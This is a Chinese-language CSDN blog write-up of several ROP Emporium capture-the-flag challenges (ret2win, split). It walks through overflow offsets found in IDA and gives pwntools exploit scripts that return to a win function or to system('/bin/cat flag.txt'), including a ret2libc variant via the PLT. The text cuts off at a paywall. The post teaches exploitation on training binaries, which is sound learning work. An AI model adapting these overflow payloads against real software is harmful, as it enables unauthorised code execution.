小白详解rop emporium

最新推荐文章于 2022-04-09 15:12:25 发布
最新推荐文章于 2022-04-09 15:12:25 发布
阅读量2k 收藏 3
点赞数 3
分类专栏: PWN CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33438733/article/details/81352721
版权
本文是小白对rop emporium挑战的详细解析,涵盖ret2win、split、callme等系列题目,涉及32位和64位系统的rop链构造,包括利用ida分析、寻找溢出点、绕过限制等技巧,旨在帮助初学者理解rop工作原理。
摘要由CSDN通过智能技术生成

小白详解rop emporium

前言

rop emporium网站上提供了许多构造ropchallenge,作为小白的我从这里开始,专注于rop链的构造。
ps:写完放了好久结果没投出去,我好菜啊-。-

题目

0x0

ret2win32

IDA打开,很容易找到溢出点

这里写图片描述

char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28

memset(&s, 0, 0x20u);s分配了0x20大小的内存
fgets(&s, 50, stdin)stdin中读入50
从上面三条指令可以看出如果我們輸入0x28那麼正好可以写到ebp之前,后面的0x10字节的内容就可以让我们任意的覆盖了。而且ebp之后便是ret的返回地址。
有一点值得引起注意,我们回车换行符同样会输入进去0x10
明确溢出点以及可溢出的字节后接下来我们就开始构造rop,但在这之前我们还应检查一下程序开启了哪些保护,这决定了我们该采取何种rop攻击方式
checksec ret2win32

这里写图片描述

有关linux下的保护措施,在此不做说明。

程序中已经有ret2win函数,通过控制流跳转到此函数,便可得到flag

脚本如下:

from pwn import*


def attack_remote():
    # echo 0 > /proc/sys/kernel/randomize_va_space
    context(arch='i386', os='linux', endian='little', rename_corefiles=False)
    context.log_level = 'debug'
    context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
    conn = remote('localhost', 10000)
    raw_input("go?")
    payload = "a" * 0x28 + p32(0) + p32(0x08048659)
    conn.send(payload)
    conn.interactive()


attack_remote()

因为这是第一题所以简单说一下溢出点的判断,后续则专注与rop链的构造

ret2win64

仅仅是stack的offset发生了变化

脚本如下:

from pwn import*


def attack_remote():
    # echo 0 > /proc/sys/kernel/randomize_va_space
    context(arch='arm64', os='linux', endian='little', rename_corefiles=False)
    # context.log_level = 'debug'
    context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
    conn = remote('localhost', 10000)
    raw_input("go?")
    payload = "a" * 0x20 + p64(0) + p64(0x400811)
    conn.send(payload)
    conn.interactive()


attack_remote()

可能有同学会疑问p64(0)的作用,这是为了覆盖ebp

以上的rop我们称作ret2text

0x1

split32

溢出点还是一样的,只不过少了直接利用的函数,但是程序中提供了system/bin/cat flag.txt,同样的ret到system并且通过栈传入/bin/cat flag.txt即可
脚本如下:

from pwn import*


def attack_remote():
    # echo 0 > /proc/sys/kernel/randomize_va_space
    context(arch='i386', os='linux', endian='little', rename_corefiles=False)
    context.log_level = 'debug'
    context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
    conn = remote('localhost', 10000)
    raw_input("go?")
    payload = "a" * 0x28 + p32(0) + p32(0x08048657)+p32(0x0804A030)
    conn.send(payload)
    conn.interactive()

此题还有意外一种思路,我们可以不直接返回到text段,而是通过.plt段,利用linux下的延迟绑定技术,找到内存中system的真实地址,并且传入参数。

这里写图片描述
在linux中主要是通过ld.so进行加载动态库,从图中我们也可以看到此时将libc中的system加载到内存
此时的脚本如下:

def attack_remote1():
    # echo 0 > /proc/sys/kernel/randomize_va_space
    context(arch='i386', os='linux', endian='little', rename_corefiles=False)
    context.log_level = 'debug'
    context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
    conn = remote('localhost', 10000)
    raw_input("go?")
    payload = "a" * 0x28 + p32(0) + p32(0x08048430)+p32(0)+p32(0x0804A030)
    conn.send(payload)
    conn.interactive()

我想有部分同学会对第二个p32(0)感到困惑,其实我也很疑惑,正常跳转来说p32(0x08048430)之后就应该接上p32(0x0804A030)作为第一个参数。好吧,我比较喜欢钻死胡同,网上下了glibc的源码,看了下system函数的实现

int
__libc_system (const char *line)
{
  if (line == NULL)
    /* Check that we have a command processor available.  It might
       not be available after a chroot(), for example.  */
    return do_system ("exit 0") == 0;

  return do_system (line);
}
weak_alias (__libc_system, system)

emmm,ida里面看看

这里写图片描述

其中eax作为我们传入的参数,位于[esp+0Ch+arg_0]中,结合上一条语句可以知道中间确实需要写一个p32(0)作为填充。

完全可以当我这段没写,记住就好了哈!

至此,我们已经成功的拿到flag。
此种rop我们称作ret2libc

split

由于64位使用寄存器传参,因此就不能像上题那样,我们必须把/bin/cat flag.txt通过pop传入寄存器中,这里就需要了解下万能rop链了。

这里写图片描述

这段代码是_libc_csu_init中的代码,也就是所有的linux64位程序都会有这段,想必你一定知道IDA中的CD键,其实pop r15的机器码是41 5fpop rdi的机器码是5f,正是这微小的差别(不知道我这么解释能不能理解-。-)
当然啦,如果你不想理解,也可以直接使用工具ropper或者ROPgadget搜索相应的rop,由于第一次提到这两个工具,我在这里就简述一下这两个工具的使用。
两个工具差不多,都可以通过pip安装,这里就讲一下ROPgadget
ROPgadget -h查看帮助,其中提供了很多例子。

ROPgadget --binary ./split --ropchain | grep "pop rdi ; ret"

最低0.47元/天 解锁文章
坚强的女程序员
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ROP Emporium一系列题
weixin_44296844的博客
12-21 471
Rop Emporium 最近在学习ROP,发现ROP Emporium这个网站上题目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。因为是直接从笔记上粘贴的,所以没有排版啥的,。。 ret2win_32 简单的覆盖返回地址跳转到后门函数 #coding="utf-8" from pwn import * sh=process("./ret2win3...
ROP Emporium-split
网安星空
01-05 369
ROP Emporium是一个通过一系列的挑战来学习ROP的网站,ROP常用于PWN的场景,是CTF的必备技能
ROP Emporium-callme
网安星空
01-06 422
ROP Emporium网站CTF相关PWN靶场callme,主要是PWN栈溢出中ROP技巧的练习
ROP Emporium write4
u014377094的博客
02-10 2389
checksec还是老样子 ida打开 依旧是pwnme函数,点开是个plt跳转 文件给了.so,那么ida打开 明显栈溢出 继续找可利用的漏洞,注意看notice,提示打开printfile 我们可以看到这里传参是个指针,下面fopen后fgets接着puts了,fopen是拿来开文件的,文件里不正是flag,这次倒是让system休息了一回。 现在我们要做的就是让al指向写有文件名的地址。现在难点在如何在一块区域写下文件名,并且知道这块地址是多少。栈想来想去也不知道怎么做,但.
ROP Emporium badchars32 wp
devil8123665的博客
03-26 731
wp 1 IDA进行分析发现溢出函数 1、溢出函数 int pwnme() { unsigned int v1; // [esp+0h] [ebp-38h] unsigned int i; // [esp+4h] [ebp-34h] unsigned int j; // [esp+8h] [ebp-30h] char v4[36]; // [esp+10h] [ebp-28h] BYREF ​ setvbuf(stdout, 0, 2, 0); puts("badchars..
ROP Emporium x86_64 1~6题
CoLin的pwn小屋
04-09 3266
ROP Emporium x64 1-6题
ROP Emporium-ret2win
网安星空
01-04 288
ROP Emporium网站相关挑战ret2win,旨在学习pwn中的ROP
piovt32 ROP Emporium
devil8123665的博客
03-30 486
1、栈迁移 由于某些条件限制先栈空间不足写长的ROP,需要把主要的ROP写到其他区域。在可写栈区域写一个短的ROP,完成跳转到长ROP区域,完成最终的代码执行。栈迁移有两种方法,方法一,通过两次 leave ret完成,方法二,通过控制栈顶寄存器esp,使其跳转到长ROP区域。 方法一: 汇编语言leave_ret指令 leave相当于mov esp ebp + pop ebp mov esp ebp操作指将ebp的值赋给esp,也就是让esp指向ebp所指的地方 pop ebp操作指将栈上ebp所指
ROP Emporium-write432 wp
devil8123665的博客
03-24 363
write432 wp wp: ROPEmporium-WriteUp - ios's blog ROP Emporium一系列题_Gzero__的博客-CSDN博客 在以上的wp中,在usefulFunction函数中使用的是system函数,但是我拿到的题目中,在该函数中是print_file 函数,如下: int usefulFunction() { return print_file("nonexistent"); } 所以只能自己一步一步测试。 在write4 challeng
Rompmporium漏洞:ROP Emporium漏洞
02-15
**ROP Emporium详解** ROP(Return-Oriented Programming)是一种高级的代码注入技术,它在现代计算机安全领域中占有重要地位,特别是在绕过DEP(Data Execution Prevention)和ASLR(Address Space Layout ...
rop-emporium:新型Rop Emporium 2020回收箱的解决方案
02-14
ROP Emporium 是一个在线平台,提供了一系列的练习,帮助学习者理解和掌握 ROP 技术。 在"rop-emporium: 新型 ROP Emporium 2020 回收箱的解决方案"中,我们主要探讨的是如何解决这个平台在2020年7月更新后的32位和...
rop轻松谈.pdf
10-21
ROP輕鬆談 ROP(Return Oriented Programming)是一種exploit技术,該技術通過在程式碼中注入惡意代碼,控制程式的執行流程,達到攻擊的目的。本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow...
rop开放平台
04-12
ROP(Return-Oriented Programming,返回导向编程)是一种高级的代码注入技术,广泛应用于软件安全领域,特别是针对那些启用了地址空间布局随机化(ASLR)但仍存在缓冲区溢出漏洞的程序。ROP允许攻击者在没有直接...
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
LSB隐写总结
热门推荐
BadRer的博客
02-14 1万+
前言又是一年的情人节! 单身狗表示不关我事-.- 写篇博文祝贺庆祝下。一、LSB简介LSB(英文 least significant bit)即最低有效位。LSB加密是信息隐藏中最基本的方法。由于人们识别声音或图片的能力有限,因此我们稍微改动信息的某一位是不会影响我们识别声音或图片的。二、用法通常来说LSB加密用在无损压缩的数据格式文件中,例如图像中的bmp格式和音频的wav格式。由于这两种格式未
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
CTF之堆溢出-unlink原理探究
BadRer的博客
06-12 1万+
来干!来干! 转战堆溢出,这东东确实接触的很少,听说很神奇很细腻。我也是初次接触就和大家一起共同学习下,也填补下这方面的空白。 https://sploitfun.wordpress.com/2015/02/26/heap-overflow-using-unlink/ 这篇文章讲的就是堆溢出的原理,不过全是英文,估计。。。慢慢看,不急。我就结合着它给的示例程序来分析下原理,以及如何利用堆溢出。
python实现linux下的简单进程监控
BadRer的博客
07-21 8352
最近看writeup看的有点头疼,深深感受到了自己的无知。确实还需要学习很多东西、一点一点的积累!加油!python确实很强大哦~,要想学好python就得自己多动手堆代码! 无聊写了一个进程监控的脚本,就当做是练习。其实最终实现的功能也很简单。 记录如下: 0x00: 首先这种写法要学会哦,虽然不知道具体有什么用吧,但是这代码写的,看着就很有水平!哈!def main(): whi
Rop框架详解:构建服务开放平台
"Rop轻量级开发指南是专注于服务开放平台构建的框架,与纯技术型的WebService框架如CXF、Jersey不同,Rop提供了包括应用认证、会话管理、安全控制、错误模型、版本管理和超时限制等一系列解决方案。它的设计借鉴了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值